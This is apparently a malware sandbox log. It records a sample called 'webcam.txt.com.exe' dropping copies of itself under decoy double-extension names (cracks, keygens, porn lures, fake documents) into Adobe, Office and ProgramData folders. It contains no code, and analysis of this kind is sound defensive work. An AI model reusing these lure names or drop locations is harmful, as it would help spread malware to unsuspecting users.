Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\ProgramData\USOShared\Teen Porn 16.jpg.pifJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\nls\Best Matrix Screensaver.scrJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\nls\he-il\Keygen 4 all appz.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\nls\he-il\XXX hardcore pic.jpg.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\nls\fr-ma\Cracks & Warez Archive.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\sdxs\FA000000120\_office_iss_excel_shared_ux\UserActivityUX\Adobe Premiere 9.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\nls\hr-hr\Teen Porn 16.jpg.pifJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\nls\he-il\Opera.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\nls\fr-ma\Teen Porn 16.jpg.pifJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\Porno Screensaver.scrJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\nls\sl-sl\Opera.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\MS Service Pack 5.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\Full album.mp3.pifJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\nls\he-il\Windows Sourcecode.doc.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\sdxs\FA000000120\_office_iss_excel_shared_ux\Filter\Smashing the stack.rtf.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\nls\sl-sl\Ulead Keygen.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\nls\fr-ma\Windows Sourcecode.doc.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\sdxs\FA000000120\_office_iss_excel_shared_ux\UserActivityUX\Star Office 8.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\nls\sl-si\Ulead Keygen.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\nls\sl-si\Win Longhorn Beta.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\images\themes\dark\Lightwave SE Update.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\images\themes\dark\Learn Programming.doc.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\sdxs\FA000000120\_office_iss_excel_shared_ux\Filter\The Sims 3 crack.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\sdxs\FA000000120\_office_iss_excel_shared_ux\Filter\Adobe Premiere 9.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\Ulead Keygen.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\nls\fr-ma\Doom 3 Beta.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\nls\he-il\Cracks & Warez Archive.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\nls\sl-si\WinXP eBook.doc.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\Cracks & Warez Archive.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\nls\sl-sl\Best Matrix Screensaver.scrJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\nls\sl-sl\ACDSee 9.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files (x86)\Common Files\Microsoft Shared\VSTA\Pipeline.v10.0\Contracts\Dictionary English - France.doc.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Common Files\microsoft shared\ink\de-DE\Doom 3 Beta.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\images\themes\dark\Full album.mp3.pifJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\Virii Sourcecode.scrJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\nls\fr-ma\Opera.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\sdxs\FA000000120\_office_iss_excel_shared_ux\Filter\Lightwave SE Update.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\1000 Sex and more.rtf.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\nls\hr-hr\Porno Screensaver.scrJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files (x86)\Common Files\Microsoft Shared\VSTA\Pipeline.v10.0\Contracts\Microsoft Office 2003 Crack.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\nls\fr-ma\The Sims 3 crack.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\nls\fr-ma\Smashing the stack.rtf.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\sdxs\FA000000120\_office_iss_excel_shared_ux\Filter\Partitionsmagic 9.0.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\sdxs\FA000000120\_office_iss_excel_shared_ux\UserActivityUX\Microsoft WinXP Crack.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Common Files\microsoft shared\ink\de-DE\Screensaver.scrJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Dictionary English - France.doc.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\nls\he-il\Porno Screensaver.scrJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\sdxs\FA000000120\_office_iss_excel_shared_ux\UserActivityUX\Norton Antivirus 2004.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\nls\fr-ma\3D Studio Max 3dsmax.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\images\themes\dark\3D Studio Max 3dsmax.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\sdxs\FA000000120\_office_iss_excel_shared_ux\Filter\Best Matrix Screensaver.scrJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files (x86)\Common Files\Microsoft Shared\VSTA\Pipeline.v10.0\Contracts\Microsoft WinXP Crack.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\nls\Virii Sourcecode.scrJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files (x86)\Common Files\Microsoft Shared\MSInfo\en-US\Opera.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\Keygen 4 all appz.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files (x86)\Common Files\Microsoft Shared\VSTA\Pipeline.v10.0\Contracts\Norton Antivirus 2004.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\nls\fr-ma\ACDSee 9.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\Norton Antivirus 2004.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\nls\Porno Screensaver.scrJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\ProgramData\USOShared\Adobe Premiere 9.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\E-Book Archive.rtf.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\Dictionary English - France.doc.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\sdxs\FA000000120\_office_iss_excel_shared_ux\UserActivityUX\XXX hardcore pic.jpg.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Common Files\microsoft shared\ink\de-DE\Windows Sourcecode.doc.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files (x86)\Common Files\Microsoft Shared\VSTA\Pipeline.v10.0\AddInViews\Ulead Keygen.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\sdxs\FA000000120\_office_iss_excel_shared_ux\Filter\ACDSee 9.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\nls\fr-fr\The Sims 3 crack.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\sdxs\FA000000120\_office_iss_excel_shared_ux\Filter\Porno Screensaver.scrJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\Serials.txt.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\sdxs\FA000000120\_office_iss_excel_shared_ux\UserActivityUX\Dark Angels.pifJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\sdxs\FA000000120\_office_iss_excel_shared_ux\UserActivityUX\ACDSee 9.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Help\Adobe Photoshop 9 full.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\nls\sl-sl\Keygen 4 all appz.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\nls\sl-sl\Norton Antivirus 2004.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\ACDSee 9.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\nls\he-il\Virii Sourcecode.scrJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files (x86)\Common Files\Microsoft Shared\VSTA\Pipeline.v10.0\Contracts\Clone DVD 5.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\nls\sl-sl\Cracks & Warez Archive.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\nls\sl-si\Visual Studio Net Crack.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\nls\sl-sl\Microsoft WinXP Crack.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files (x86)\Common Files\Microsoft Shared\VSTA\Pipeline.v10.0\Contracts\Cracks & Warez Archive.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files (x86)\Common Files\Microsoft Shared\VSTA\Pipeline.v10.0\AddInViews\Lightwave SE Update.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files (x86)\Common Files\Microsoft Shared\VSTA\Pipeline.v10.0\Contracts\Smashing the stack.rtf.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\nls\fr-ma\Screensaver.scrJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\sdxs\FA000000120\_office_iss_excel_shared_ux\Filter\1000 Sex and more.rtf.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files (x86)\Common Files\Microsoft Shared\VSTA\Pipeline.v10.0\Contracts\Partitionsmagic 9.0.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\nls\sl-sl\RFC Basics Full Edition.doc.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\nls\sl-sl\Dark Angels.pifJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\sdxs\FA000000120\_office_iss_excel_shared_ux\Filter\Cracks & Warez Archive.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files (x86)\Common Files\Microsoft Shared\VSTA\Pipeline.v10.0\Contracts\ACDSee 9.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\nls\sl-si\Dark Angels.pifJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\Ahead Nero 7.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\images\themes\dark\RFC Basics Full Edition.doc.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\sdxs\FA000000120\_office_iss_excel_shared_ux\Filter\Adobe Photoshop 9 full.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\nls\sl-sl\XXX hardcore pic.jpg.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\nls\fr-ma\Porno Screensaver.scrJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\sdxs\FA000000120\_office_iss_excel_shared_ux\UserActivityUX\Keygen 4 all appz.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\nls\sl-si\Opera.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\nls\hr-hr\Microsoft Office 2003 Crack.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\nls\sl-sl\Doom 3 Beta.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\nls\sl-si\Doom 3 Beta.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\sdxs\FA000000120\_office_iss_excel_shared_ux\Filter\WinXP eBook.doc.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\nls\he-il\Adobe Premiere 9.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\sdxs\FA000000120\_office_iss_excel_shared_ux\Filter\Dark Angels.pifJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\nls\he-il\Lightwave SE Update.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\Windows Sourcecode.doc.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\images\themes\dark\How to hack.doc.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\nls\sl-si\Screensaver.scrJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files (x86)\Common Files\Microsoft Shared\MSInfo\en-US\The Sims 3 crack.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\nls\sl-sl\Screensaver.scrJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\nls\sl-si\Microsoft Office 2003 Crack.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\nls\he-il\Partitionsmagic 9.0.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files (x86)\Common Files\Microsoft Shared\VSTA\Pipeline.v10.0\Contracts\Lightwave SE Update.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\Win Longhorn Beta.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\3D Studio Max 3dsmax.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\sdxs\FA000000120\_office_iss_excel_shared_ux\Filter\DivX 7.0 final.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\sdxs\FA000000120\_office_iss_excel_shared_ux\Filter\Gimp 1.5 Full with Key.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\Microsoft WinXP Crack.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\nls\sl-sl\Magix Video Deluxe 4.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files (x86)\Common Files\Microsoft Shared\VSTA\Pipeline.v10.0\Contracts\Ulead Keygen.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\nls\Microsoft WinXP Crack.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\nls\he-il\Microsoft Office 2003 Crack.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files (x86)\Common Files\Microsoft Shared\VSTA\Pipeline.v10.0\Contracts\Visual Studio Net Crack.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\WinAmp 12 full.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files (x86)\Common Files\Microsoft Shared\VSTA\Pipeline.v10.0\Contracts\Serials.txt.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\DivX 7.0 final.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\sdxs\FA000000120\_office_iss_excel_shared_ux\Filter\Microsoft WinXP Crack.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\Gimp 1.5 Full with Key.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\sdxs\FA000000120\_office_iss_excel_shared_ux\Filter\Opera.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\sdxs\FA000000120\_office_iss_excel_shared_ux\UserActivityUX\Adobe Photoshop 9 full.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\IE58.1 full setup.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\images\themes\dark\Windows Sourcecode.doc.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\nls\sl-sl\1000 Sex and more.rtf.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\nls\sl-sl\Dictionary English - France.doc.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files (x86)\Common Files\Microsoft Shared\VSTA\Pipeline.v10.0\AddInViews\IE58.1 full setup.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\Microsoft Office 2003 Crack.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\nls\Dark Angels.pifJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\Clone DVD 5.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\WinXP eBook.doc.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\Ulead Keygen.exeJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\nls\fr-ma\Full album.mp3.pifJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\Best Matrix Screensaver.scrJump to dropped file
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\nls\sl-si\Smashing the stack.rtf.exeJump to dropped file
